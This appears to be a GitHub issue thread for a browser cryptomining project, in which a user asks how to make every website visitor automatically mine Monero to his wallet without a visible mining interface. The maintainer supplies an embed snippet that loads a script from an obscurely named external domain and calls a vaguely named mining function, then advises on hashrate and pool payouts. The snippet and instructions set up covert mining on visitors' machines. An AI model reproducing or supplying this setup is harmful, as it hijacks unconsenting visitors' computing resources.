### ISSUE TITLE
Setup question

### ISSUE THREAD

**Issue by therawest** [PiTi2k5/Crypto-Webminer#22]
Hello, is it possible that all miners which are on website that they mine on the same adress?
Or is it possible to collect fee from all miners on website?
So when it comes to payout I would get like 1% ?

**Comment by PiTi2k5** [comment]
Sure, all miners/visitors with same wallet will be bundled.

**Comment by therawest** [comment]
I didn't mean like that, I thought like whoever comes to website is automaticly mining to specified wallet.
Can this be setup?

**Comment by PiTi2k5** [comment]
Sure with integration script instead of webmining UI https://www.crypto-webminer.com/integrate.html

**Comment by therawest** [comment]
> Sure with integration script instead of webmining UI https://www.crypto-webminer.com/integrate.html

So I should remove this?
 	
    <script src="scripts/gustav.js?v290918"></script>

**Comment by therawest** [comment]
Please explain with more details how to make this happen,

**Comment by PiTi2k5** [comment]
<script src="https://trustiseverything.de/karma/karma.js?karma=bs?nosaj=faster.mo" ></script>
<script type="text/javascript">
EverythingIsLife('replace_with_your_xmr_address', 'x', 50);
</script>

Place this between your html body tags and replace the placeholder with your wallet. If you dont need an webmining UI
Pool stats can be checked on https://moneroocean.stream/#/dashboard

**Comment by therawest** [comment]
Thank you for helping out. One more question
Somehow it's low hashrate..do you know why?
I've got INTEL I5 9th gen 9400f  and I should have at least 1.9kh/s and I've got like 120h/s
Why is that? And it's not limited trough buffer in script. How to fix this?

**Comment by PiTi2k5** [comment]
It is because you mining the most profitable algo automatically and got reward in monero on moneroocean pool. Pay Hashrate is higher than mining speed around x10-x15. After some mining time check pool website and you will see it what i mean. But native software mining is always faster than webmining.

**Comment by PiTi2k5** [comment]
.
